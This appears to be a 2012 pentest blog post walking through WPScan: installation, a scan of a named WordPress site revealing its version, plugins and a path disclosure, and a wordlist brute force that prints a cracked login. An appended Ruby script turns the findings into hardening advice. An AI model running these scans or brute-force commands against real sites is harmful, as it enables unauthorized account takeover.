312 Wpscan WORDPRESS PASSWORD
Posted on 2012-10-12 23:39:03
Installation
    root@Dis9Team:~# apt-get install libcurl4-gnutls-dev libopenssl-ruby
    root@Dis9Team:~# gem install typhoeus nokogiri json
    root@Dis9Team:~# cd /pen/web/
    root@Dis9Team:/pen/web# git clone git://github.com/wpscanteam/wpscan.git
Default data

The authors have collected some FUZZDB data here; take a look if you are interested and merge it into your own wordlists.

    root@Dis9Team:/pen/web/wpscan/data# ls
    malwares.txt      plugins.txt       themes_full.txt  timthumbs.txt       wp_versions.xml
    plugins_full.txt  plugin_vulns.xml  themes.txt       wp_theme_vulns.xml  wp_vulns.xml
Default test
    root@Dis9Team:/pen/web/wpscan# ./wpscan.rb --url fuzzexp.org
    ____________________________________________________
     __          _______   _____
     \ \        / /  __ \ / ____|
      \ \  /\  / /| |__) | (___   ___  __ _ _ __
       \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        \  /\  /  | |     ____) | (__| (_| | | | |
         \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0r9e293b3

        WordPress Security Scanner by the WPScan Team
    Sponsored by the RandomStorm Open Source Initiative
    _____________________________________________________

    | URL: http://fuzzexp.org/
    | Started on Tue Sep 25 07:03:23 2012

    [!] The WordPress theme in use is openark-blog v1.1
    [!] The WordPress 'http://fuzzexp.org/readme.html' file exists
    [!] Full Path Disclosure (FPD) in 'http://fuzzexp.org/wp-includes/rss-functions.php'
    [!] WordPress version 3.4.1 identified from meta generator

    [+] Enumerating plugins from passive detection ... 6 found :

    | Name: my-videotag
    | Location: http://fuzzexp.org/wp-content/plugins/my-videotag/

    | Name: better-wordpress-syntax-based-on-geshi
    | Location: http://fuzzexp.org/wp-content/plugins/better-wordpress-syntax-based-on-geshi/

    | Name: Highslide_pre
    | Location: http://fuzzexp.org/wp-content/plugins/Highslide_pre/

    | Name: auto-highslide
    | Location: http://fuzzexp.org/wp-content/plugins/auto-highslide/

    | Name: down-as-pdf
    | Location: http://fuzzexp.org/wp-content/plugins/down-as-pdf/

    | Name: wordpress-wiki-plugin
    | Location: http://fuzzexp.org/wp-content/plugins/wordpress-wiki-plugin/

    [+] Finished at Tue Sep 25 07:03:30 2012
    root@Dis9Team:/pen/web/wpscan#
This yields the WP theme, the WP version and some plugin information.

Cracking a password
    root@Dis9Team:/pen/web/wpscan# ./wpscan.rb --url fuzzexp.org --wordlist /tmp/pass --username test
    [+] Starting the password brute forcer

      Brute forcing user 'test' with 3 passwords... 100% complete.
      [SUCCESS] Username : test Password : test


    [+] Finished at Tue Sep 25 07:05:55 2012
Getting detailed information
    root@Dis9Team:/pen/web/wpscan# ruby wpscan.rb --url fuzzexp.org --enumerate
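As an added example (not part of the original post and not WPScan code), this Ruby script parses console output in the format shown above and turns each finding into a hardening action for the site owner. The `triage` function, the `RULES` table and the remediation wording are hypothetical; the sample is abridged and combined from the two runs in the post.

```ruby
# Added example: map WPScan 2.0 console findings to hardening actions.
# SAMPLE is abridged from the output in the post; names are hypothetical.
SAMPLE = <<~'OUT'
  | URL: http://fuzzexp.org/
  [!] The WordPress theme in use is openark-blog v1.1
  [!] The WordPress 'http://fuzzexp.org/readme.html' file exists
  [!] Full Path Disclosure (FPD) in 'http://fuzzexp.org/wp-includes/rss-functions.php'
  [!] WordPress version 3.4.1 identified from meta generator
  [+] Enumerating plugins from passive detection ... 6 found :
  | Name: my-videotag
  | Location: http://fuzzexp.org/wp-content/plugins/my-videotag/
  | Name: down-as-pdf
  | Location: http://fuzzexp.org/wp-content/plugins/down-as-pdf/
  [SUCCESS] Username : test Password : test
OUT

# Each rule pairs a finding pattern with the action it implies for the owner.
RULES = [
  [/theme in use is (\S+) v([\d.]+)/,
   ->(m) { "Theme #{m[1]} #{m[2]} is fingerprintable: confirm it is current" }],
  [/'(\S+readme\.html)' file exists/,
   ->(m) { "Remove or block #{m[1]}" }],
  [/Full Path Disclosure \(FPD\) in '(\S+)'/,
   ->(m) { "Turn off display_errors: #{m[1]} leaks the install path" }],
  [/WordPress version ([\d.]+) identified from meta generator/,
   ->(m) { "Core #{m[1]} is disclosed: drop the generator tag and patch" }],
  # The pattern stops before the password so it never reaches the report.
  [/\[SUCCESS\] Username : (\S+) Password : /,
   ->(m) { "Account '#{m[1]}' has a guessable password: reset it" }]
].freeze

def triage(output)
  report = { url: nil, plugins: [], actions: [] }
  output.each_line(chomp: true) do |raw|
    line = raw.strip
    if (m = line.match(/\A\| URL: (\S+)/))
      report[:url] = m[1]
    elsif (m = line.match(/\A\| Name: (\S+)/))
      report[:plugins] << m[1] # plugin inventory to check against updates
    else
      RULES.each do |pattern, advice|
        hit = line.match(pattern)
        report[:actions] << advice.call(hit) if hit
      end
    end
  end
  report
end

puts triage(SAMPLE)[:actions] if __FILE__ == $PROGRAM_NAME
```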